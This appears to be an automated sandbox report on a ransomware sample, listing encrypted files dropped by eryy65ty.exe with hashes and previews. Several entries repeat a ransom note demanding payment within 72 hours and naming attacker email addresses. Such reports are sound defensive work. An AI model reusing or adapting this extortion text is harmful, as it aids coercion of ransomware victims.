                                                                                                                                            Preview:.......w....av...V.-.... Q..U.._e..5.....j.?9.Y#d\_..Y..N....Q.qg...3.\R..{.xX....;.H.z/.^.P(O...v...DH..}..LP.:...|K....6t].OL.E...e.hJT..Oh.6...E..S[p........6z..j.[....m.c..^(...2.mages\bing.ico.......$y.7.5........Qwu..P.QDJ...?..j.d..........=8.Jf.<...a.z.c.Z.;.O...$.m........0.#...t.'..]..p.#O.U.D.jggJP}..J.0r{m\X.............v.@vZ..Ib.G.;.........*NNfU...bZ....E....K..#&..VO[..0L...f..m..#l.'z....l/......y....^.J...X.!.........&.N..&0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):379
                                                                                                                                            Entropy (8bit):7.473796065918072
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:mn1gx2OYE5lCdXdYJbGZaM8CdWlJXGRD2GvNn1kyL4/xxBn2CzYd/4v5W2ip/q6m:sWCjYhGJ4HG31JLUBn2v4RWJSUOZn
                                                                                                                                            MD5:0D5527309E75BDF672A1A53A8BD0F707
                                                                                                                                            SHA1:E36E5B6411CD2C035A36157F31FF61B2A86BAB6E
                                                                                                                                            SHA-256:D6B43951A75E3FDC8C61866888BCFE7A416D04EB8D5F26BB6340FB6A09AE8B31
                                                                                                                                            SHA-512:AE62555A4CE0AFA9ED536CB382374BCD7CFC08C89C04D9A29EDBAF4B62B16DFB82DB02223954F31AB8D9D7AFB662EA22EC57E1BCF1230E944F87666BE965297A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......P.9[...X)..RB=..o..Z......*n.W_..T.....B0..T4..9.TC:6v......T.&.KbX.e....#N.M...UoV_..r4......%...L...,...Z..-*V....`.6.E.{..2...Y..C...{....SkH.....1f.f.>..+.;......2 .:....4"F.!..z...4.$}..\..HfA..,.......#...N}L....m{.e.S..@.|..s.....m(.T..D.*b..=E.>lH...(.|j..GpWe&<...zR...i9-BEF.=.,O... O.j.b.%..S.m.eb3q..6e?.NJ*..=..k......Y]..Tj.[0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):379
                                                                                                                                            Entropy (8bit):7.473796065918072
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:mn1gx2OYE5lCdXdYJbGZaM8CdWlJXGRD2GvNn1kyL4/xxBn2CzYd/4v5W2ip/q6m:sWCjYhGJ4HG31JLUBn2v4RWJSUOZn
                                                                                                                                            MD5:0D5527309E75BDF672A1A53A8BD0F707
                                                                                                                                            SHA1:E36E5B6411CD2C035A36157F31FF61B2A86BAB6E
                                                                                                                                            SHA-256:D6B43951A75E3FDC8C61866888BCFE7A416D04EB8D5F26BB6340FB6A09AE8B31
                                                                                                                                            SHA-512:AE62555A4CE0AFA9ED536CB382374BCD7CFC08C89C04D9A29EDBAF4B62B16DFB82DB02223954F31AB8D9D7AFB662EA22EC57E1BCF1230E944F87666BE965297A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......P.9[...X)..RB=..o..Z......*n.W_..T.....B0..T4..9.TC:6v......T.&.KbX.e....#N.M...UoV_..r4......%...L...,...Z..-*V....`.6.E.{..2...Y..C...{....SkH.....1f.f.>..+.;......2 .:....4"F.!..z...4.$}..\..HfA..,.......#...N}L....m{.e.S..@.|..s.....m(.T..D.*b..=E.>lH...(.|j..GpWe&<...zR...i9-BEF.=.,O... O.j.b.%..S.m.eb3q..6e?.NJ*..=..k......Y]..Tj.[0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):377
                                                                                                                                            Entropy (8bit):7.485754317972221
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:rllkXod7a4arMa0vGvOvAuEzDEDuFN3MYn+NtDx2cPmH7/V78rDLsuxI5dIs6n:J3VajPTO4uanFN5y4/N8rXjxI5gn
                                                                                                                                            MD5:2DA0010264205199B0B0793EB49B3558
                                                                                                                                            SHA1:702CDC210631945A51FAE9C17946FC0DCB4887D9
                                                                                                                                            SHA-256:CB5C25A6077A11BC5BDFFEEB45ABD39E17DA9C6DBF4130BBE6E2F72B45D92E6A
                                                                                                                                            SHA-512:5119E1D62AA8A452C8859972900429BD8263F3121F17D0791661B7C9677723084A40DCF34997005CB32F48C35B4449AEE0F214B1DED06DCB9C8E3071AFA8E569
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:A.)+..c.C.....o..''5...../.T.......C_..SY..3.@...B........O.8.....4R...s.o...,....i.n....w.google.com/...;...0HA....a .+..{S......_.')R{...a=..f.......!..7s$pw..j.*..v.h_....(`z.!EL....#!...`~..s...e.D.U?....Z.`@....?...h(M..:.'r.}...#lP...|7.......6...>.{1.......6...V..g.".q....8.Z..jJ..=Z($.S...|....P.G.......r..V..t#...w....Z...........E.q...B[%...0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):377
                                                                                                                                            Entropy (8bit):7.485754317972221
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:rllkXod7a4arMa0vGvOvAuEzDEDuFN3MYn+NtDx2cPmH7/V78rDLsuxI5dIs6n:J3VajPTO4uanFN5y4/N8rXjxI5gn
                                                                                                                                            MD5:2DA0010264205199B0B0793EB49B3558
                                                                                                                                            SHA1:702CDC210631945A51FAE9C17946FC0DCB4887D9
                                                                                                                                            SHA-256:CB5C25A6077A11BC5BDFFEEB45ABD39E17DA9C6DBF4130BBE6E2F72B45D92E6A
                                                                                                                                            SHA-512:5119E1D62AA8A452C8859972900429BD8263F3121F17D0791661B7C9677723084A40DCF34997005CB32F48C35B4449AEE0F214B1DED06DCB9C8E3071AFA8E569
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:A.)+..c.C.....o..''5...../.T.......C_..SY..3.@...B........O.8.....4R...s.o...,....i.n....w.google.com/...;...0HA....a .+..{S......_.')R{...a=..f.......!..7s$pw..j.*..v.h_....(`z.!EL....#!...`~..s...e.D.U?....Z.`@....?...h(M..:.'r.}...#lP...|7.......6...>.{1.......6...V..g.".q....8.Z..jJ..=Z($.S...|....P.G.......r..V..t#...w....Z...........E.q...B[%...0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):375
                                                                                                                                            Entropy (8bit):7.413357643927694
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:4fm4CN4gzL6NvqGtSeBk9g6PMmmym7B8ySNkQk2p/ZcVdXJtuWpwn:4e4CLzL6NuAk9B13miqmRSVmWpwn
                                                                                                                                            MD5:948CFE209E773C3FD581B429076A9903
                                                                                                                                            SHA1:F1DE702FAE76A6C52FAF1204B1776F1D41A31609
                                                                                                                                            SHA-256:3346A53CF41F8F7157D8D91CB64FCB8090B1CF809818502B468B7B371912049C
                                                                                                                                            SHA-512:505CF496801554018D0F1EBA4C07BD58C7D7A94F0C32BEF36DEB3BD6FEAAE85C9DE05882BCAC0D854B34268005222C77CD954DF5689574A6EDEC5491968A4521
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:....h.0.f.b.[.{...]...b.:Mwv.wN4......In.&+.(x.*.D.>Qh..H......d|......r.-.o...<Z\{,...3.w.live.com/.....c.._,.;#.}n.+5.X[dq...u\?.. ..Z..G.e.w.....F]....Z3.Z..;....|....{nuS....F...=.K..b....*.D...0......Ok5...>.).m.|PBT.s9h.MN..}U2.v.A}.CO..'M.....M.....#G*.^.?.z...Ez....0.%v....b.5...".>.....-....<N...!.;.qc.h7.%r..i.Z.YF9Z.....58....2F..S.....0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):375
                                                                                                                                            Entropy (8bit):7.413357643927694
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:4fm4CN4gzL6NvqGtSeBk9g6PMmmym7B8ySNkQk2p/ZcVdXJtuWpwn:4e4CLzL6NuAk9B13miqmRSVmWpwn
                                                                                                                                            MD5:948CFE209E773C3FD581B429076A9903
                                                                                                                                            SHA1:F1DE702FAE76A6C52FAF1204B1776F1D41A31609
                                                                                                                                            SHA-256:3346A53CF41F8F7157D8D91CB64FCB8090B1CF809818502B468B7B371912049C
                                                                                                                                            SHA-512:505CF496801554018D0F1EBA4C07BD58C7D7A94F0C32BEF36DEB3BD6FEAAE85C9DE05882BCAC0D854B34268005222C77CD954DF5689574A6EDEC5491968A4521
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:....h.0.f.b.[.{...]...b.:Mwv.wN4......In.&+.(x.*.D.>Qh..H......d|......r.-.o...<Z\{,...3.w.live.com/.....c.._,.;#.}n.+5.X[dq...u\?.. ..Z..G.e.w.....F]....Z3.Z..;....|....{nuS....F...=.K..b....*.D...0......Ok5...>.).m.|PBT.s9h.MN..}U2.v.A}.CO..'M.....M.....#G*.^.?.z...Ez....0.%v....b.5...".>.....-....<N...!.;.qc.h7.%r..i.Z.YF9Z.....58....2F..S.....0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):378
                                                                                                                                            Entropy (8bit):7.376412523536635
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:77bGiTwPHXt2DYHWFK6ioxPvZ4syFKg+VGGNaFCY36bpMX9f94ouKH8F8ogHhHCR:6IQ0E2J5xuF3UuX9l4qU8YiShfGKn
                                                                                                                                            MD5:BEFF4CCD302888FC9D37C125B07034A6
                                                                                                                                            SHA1:EF182B2ABA682191DFAA86BAE8906CD3F95E1921
                                                                                                                                            SHA-256:D86532C3A50F69038A117922FD5128BB2B47C06C3FE83AB0308F2124FD279B7A
                                                                                                                                            SHA-512:0615634DFD3EB394DEA781B382D4D2D977E93819C6238F3CC1481EB82C1C6DBE4C96751B0D14725F80E5350076FE67C3018D0F41E9BADB874995EB8953F932FF
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.%...bo..4"[d].....*...n.. 0c(....:<`...... }/..vp.+":.vTCfG.do}K........~.R.a.$.oZ......T.w.nytimes.com/..z...7)H.A.`..........0",h.r.t&...y.fm..../.F.X..I&...7.....,.7...=D.+.(.....4.Yn..l.. ."...8..<*z..f,...[y%.h.w.z...4.=....t_.u.k...Cn...RL..........D......1....l}}...0.Tj.vx.*..f...<w...E...}>...O"..]wO}.......h.Z.p6..;5.%...`d.....k...(e.D..0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):378
                                                                                                                                            Entropy (8bit):7.376412523536635
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:77bGiTwPHXt2DYHWFK6ioxPvZ4syFKg+VGGNaFCY36bpMX9f94ouKH8F8ogHhHCR:6IQ0E2J5xuF3UuX9l4qU8YiShfGKn
                                                                                                                                            MD5:BEFF4CCD302888FC9D37C125B07034A6
                                                                                                                                            SHA1:EF182B2ABA682191DFAA86BAE8906CD3F95E1921
                                                                                                                                            SHA-256:D86532C3A50F69038A117922FD5128BB2B47C06C3FE83AB0308F2124FD279B7A
                                                                                                                                            SHA-512:0615634DFD3EB394DEA781B382D4D2D977E93819C6238F3CC1481EB82C1C6DBE4C96751B0D14725F80E5350076FE67C3018D0F41E9BADB874995EB8953F932FF
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.%...bo..4"[d].....*...n.. 0c(....:<`...... }/..vp.+":.vTCfG.do}K........~.R.a.$.oZ......T.w.nytimes.com/..z...7)H.A.`..........0",h.r.t&...y.fm..../.F.X..I&...7.....,.7...=D.+.(.....4.Yn..l.. ."...8..<*z..f,...[y%.h.w.z...4.=....t_.u.k...Cn...RL..........D......1....l}}...0.Tj.vx.*..f...<w...E...}>...O"..]wO}.......h.Z.p6..;5.%...`d.....k...(e.D..0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):377
                                                                                                                                            Entropy (8bit):7.538206406860328
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:6mgj5YtoD31KT4SLrAKe7Ix8i6y6IYMrWUJnBEYie8vUS/jRwBpBX8TwVzyDn:SmqV63km8Qlr/JBpiISrSpBs8Vqn
                                                                                                                                            MD5:663165B9ED3E5A2941B3DBDE51705255
                                                                                                                                            SHA1:987B07F5DD9D5198A81F0FDE5FF6F3A03053C34D
                                                                                                                                            SHA-256:5C9D22F88CEAD2098354D72D4E130650E8A6380648A12D2387C2CD25C4005008
                                                                                                                                            SHA-512:C92893FBC38C78F9B30BA16B89176411377F8DBBDB2132EEA2E3234D79DD152C8FBC2A64003DF38B5387EE986DBFFD8C5BB0ACEE177FD5AB1D299196D00C8007
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...)OW..!yaX.U.o7#.6`..vH...g6........R.M0%...Z..*......s.LL_."..f.X........V.........X......w.reddit.com/..F...{.....9.A^.55+..E..Q.3!,..d1.b.V.*.......+.LK.....p.W..1;..&...%..2..].|5....pv2\.v..o(/~SSx..z.A...;..'.R.........gY....".......g;<e.|.D#.6o.......b.R7Hb...\..$Q..K..0P;.E...?..$@..9..U..`..k..].S..}.n,.<.7.0..<gH&.......;.u5.-h..+,0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):377
                                                                                                                                            Entropy (8bit):7.538206406860328
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:6mgj5YtoD31KT4SLrAKe7Ix8i6y6IYMrWUJnBEYie8vUS/jRwBpBX8TwVzyDn:SmqV63km8Qlr/JBpiISrSpBs8Vqn
                                                                                                                                            MD5:663165B9ED3E5A2941B3DBDE51705255
                                                                                                                                            SHA1:987B07F5DD9D5198A81F0FDE5FF6F3A03053C34D
                                                                                                                                            SHA-256:5C9D22F88CEAD2098354D72D4E130650E8A6380648A12D2387C2CD25C4005008
                                                                                                                                            SHA-512:C92893FBC38C78F9B30BA16B89176411377F8DBBDB2132EEA2E3234D79DD152C8FBC2A64003DF38B5387EE986DBFFD8C5BB0ACEE177FD5AB1D299196D00C8007
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...)OW..!yaX.U.o7#.6`..vH...g6........R.M0%...Z..*......s.LL_."..f.X........V.........X......w.reddit.com/..F...{.....9.A^.55+..E..Q.3!,..d1.b.V.*.......+.LK.....p.W..1;..&...%..2..].|5....pv2\.v..o(/~SSx..z.A...;..'.R.........gY....".......g;<e.|.D#.6o.......b.R7Hb...\..$Q..K..0P;.E...?..$@..9..U..`..k..].S..}.n,.<.7.0..<gH&.......;.u5.-h..+,0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):378
                                                                                                                                            Entropy (8bit):7.429093483849426
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:VUMnnvLU0VcYpoqeotNsEIVANQ5q0tqlubT9QLX9qFRc2enzWZe2bm2Q1SR80nsr:+QnvLU0VcYeqeYNsdVAWPQluCLd9zwb4
                                                                                                                                            MD5:066B3F9E26E94F7DEA708591B199CE54
                                                                                                                                            SHA1:B7A8380938B12C9AEE568149B3759E946CD61D8B
                                                                                                                                            SHA-256:007762056192667FB85116F5785E1D13A0CC8F8B2C3692DDB99FADA8F3363F05
                                                                                                                                            SHA-512:5B4C0192B5EA958623FF7427131413740E54D0D8703CE1F5DA5BA7FB0C605F234A2C84F99D640A710710A95F5BB9B0565367B6305A1E3B0236931DB6623B6C9D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PoU.. HV8i../i%.tj...)W'...dP.(.HTq...}........kP..5.F8...J.V..*....6.dP...6.B..;..w.twitter.com/..!.J...Z.<....EY.I1Mh..+'...}&..a....90.......`.M...%-.n.A.N.C.] 6L$..J..S..|..%...9........#...x-....c.V...U......j...A.K..m.P...}...XU...kx. v%....,.i....).mS=1...e...!...\....k}./..*...*.....:5n.]..q..fO{!..j.....#.*5.^=.....V....B....0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):378
                                                                                                                                            Entropy (8bit):7.429093483849426
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:VUMnnvLU0VcYpoqeotNsEIVANQ5q0tqlubT9QLX9qFRc2enzWZe2bm2Q1SR80nsr:+QnvLU0VcYeqeYNsdVAWPQluCLd9zwb4
                                                                                                                                            MD5:066B3F9E26E94F7DEA708591B199CE54
                                                                                                                                            SHA1:B7A8380938B12C9AEE568149B3759E946CD61D8B
                                                                                                                                            SHA-256:007762056192667FB85116F5785E1D13A0CC8F8B2C3692DDB99FADA8F3363F05
                                                                                                                                            SHA-512:5B4C0192B5EA958623FF7427131413740E54D0D8703CE1F5DA5BA7FB0C605F234A2C84F99D640A710710A95F5BB9B0565367B6305A1E3B0236931DB6623B6C9D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PoU.. HV8i../i%.tj...)W'...dP.(.HTq...}........kP..5.F8...J.V..*....6.dP...6.B..;..w.twitter.com/..!.J...Z.<....EY.I1Mh..+'...}&..a....90.......`.M...%-.n.A.N.C.] 6L$..J..S..|..%...9........#...x-....c.V...U......j...A.K..m.P...}...XU...kx. v%....,.i....).mS=1...e...!...\....k}./..*...*.....:5n.]..q..fO{!..j.....#.*5.^=.....V....B....0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):380
                                                                                                                                            Entropy (8bit):7.472849375604304
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:a/4XRGPepCaSauA2Cp6Y+uqAGJsyicLPAtRtp0QWzJq4zYyhzt08TR2n:awXoPYCxaZUfAGJb/jAntp0pzJp1An
                                                                                                                                            MD5:97E88165D8B2425B8591F72DF42842A2
                                                                                                                                            SHA1:AD07FFF1E99A1835F18E57C3C3BC78DFE1E598DF
                                                                                                                                            SHA-256:E39618FCBDB6C0F52D86817C4A14FD9A969C84EABD81A5790777B17D3D1C8E23
                                                                                                                                            SHA-512:B83551A485F7558105C8B482D3D489B7A270091C5FFFC5DFB231F7CF15227A8C595563CFD97571F155462F03CC4C3C862F28EE2A3AA2FCC065FA8BC71DE2C831
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:........H55....., .SK..<5....uU...5..9.3I...1?.c9:.kZ.....X..fL.s.dj_..b..!w...4.z..3..{N...O..#.M~"V/.W[....6.@.L..48...j'.O.%&....8r....i.i.......X.**..........i..Fm.5.\0.x.....D..4...~.....9..,$.L.\.E .#Q...{W>u].mr.4&..kf..P.;..O_.A..Q$..Xe..G.g.7....$....C7.....f.mf...zCT...E..1a%...O..!...\..hG......"/....<....L..).+.._..U.G.."Q.9.,XmzSM`...Z@..0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):380
                                                                                                                                            Entropy (8bit):7.472849375604304
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:a/4XRGPepCaSauA2Cp6Y+uqAGJsyicLPAtRtp0QWzJq4zYyhzt08TR2n:awXoPYCxaZUfAGJb/jAntp0pzJp1An
                                                                                                                                            MD5:97E88165D8B2425B8591F72DF42842A2
                                                                                                                                            SHA1:AD07FFF1E99A1835F18E57C3C3BC78DFE1E598DF
                                                                                                                                            SHA-256:E39618FCBDB6C0F52D86817C4A14FD9A969C84EABD81A5790777B17D3D1C8E23
                                                                                                                                            SHA-512:B83551A485F7558105C8B482D3D489B7A270091C5FFFC5DFB231F7CF15227A8C595563CFD97571F155462F03CC4C3C862F28EE2A3AA2FCC065FA8BC71DE2C831
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:........H55....., .SK..<5....uU...5..9.3I...1?.c9:.kZ.....X..fL.s.dj_..b..!w...4.z..3..{N...O..#.M~"V/.W[....6.@.L..48...j'.O.%&....8r....i.i.......X.**..........i..Fm.5.\0.x.....D..4...~.....9..,$.L.\.E .#Q...{W>u].mr.4&..kf..P.;..O_.A..Q$..Xe..G.g.7....$....C7.....f.mf...zCT...E..1a%...O..!...\..hG......"/....<....L..).+.._..U.G.."Q.9.,XmzSM`...Z@..0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):378
                                                                                                                                            Entropy (8bit):7.431182958468482
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:ASV47BYIiWNHgsrJApU2TNtnG/vYaRQ5YhSHcXLlbjLry8vqGi89xC6ClkY4KT6N:XmYI3FiFG/V0cblH/8STC6t+rl+XAAn
                                                                                                                                            MD5:459CD07F10EA76AB24B66A09031953EF
                                                                                                                                            SHA1:EDDDEB5DCE4FFD01D4C7AEFEC558BBF299427A51
                                                                                                                                            SHA-256:E8BCE78FE699404F087C212F785F662948256A7829008F2355183327E53B964D
                                                                                                                                            SHA-512:94E8849C69374E2011C5F4CBD2D0A2B79B7E68D0BF2AD036763F28C36DD92C21F6CE628357DBC4D05C2F5595F56BB34023053374581BE83C36426CA5E40D9C26
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.R}S...V....c@P>k...T....&....= ......`............A......#..#d}./...gE{....$...,,.....T...z.!.w.youtube.com/..+R~.3....6.H?|'..$"....16.ZV.Ya"C.@..!U.Ed....K...."..E`..{.p.HP..n.!&....SHA.y.#F..S..4.'.X2...r./.J.,.n.':...8Ry..`:...)..{..A0....U..F......s..A..j.H.{.o..c].x....?.qC&......l../.....&fW...z....v.}.+...*...@...EY@././6.if.....D.r+...k"....0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):378
                                                                                                                                            Entropy (8bit):7.431182958468482
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:ASV47BYIiWNHgsrJApU2TNtnG/vYaRQ5YhSHcXLlbjLry8vqGi89xC6ClkY4KT6N:XmYI3FiFG/V0cblH/8STC6t+rl+XAAn
                                                                                                                                            MD5:459CD07F10EA76AB24B66A09031953EF
                                                                                                                                            SHA1:EDDDEB5DCE4FFD01D4C7AEFEC558BBF299427A51
                                                                                                                                            SHA-256:E8BCE78FE699404F087C212F785F662948256A7829008F2355183327E53B964D
                                                                                                                                            SHA-512:94E8849C69374E2011C5F4CBD2D0A2B79B7E68D0BF2AD036763F28C36DD92C21F6CE628357DBC4D05C2F5595F56BB34023053374581BE83C36426CA5E40D9C26
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.R}S...V....c@P>k...T....&....= ......`............A......#..#d}./...gE{....$...,,.....T...z.!.w.youtube.com/..+R~.3....6.H?|'..$"....16.ZV.Ya"C.@..!U.Ed....K...."..E`..{.p.HP..n.!&....SHA.y.#F..S..4.'.X2...r./.J.,.n.':...8Ry..`:...)..{..A0....U..F......s..A..j.H.{.o..c].x....?.qC&......l../.....&fW...z....v.}.+...*...@...EY@././6.if.....D.r+...k"....0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
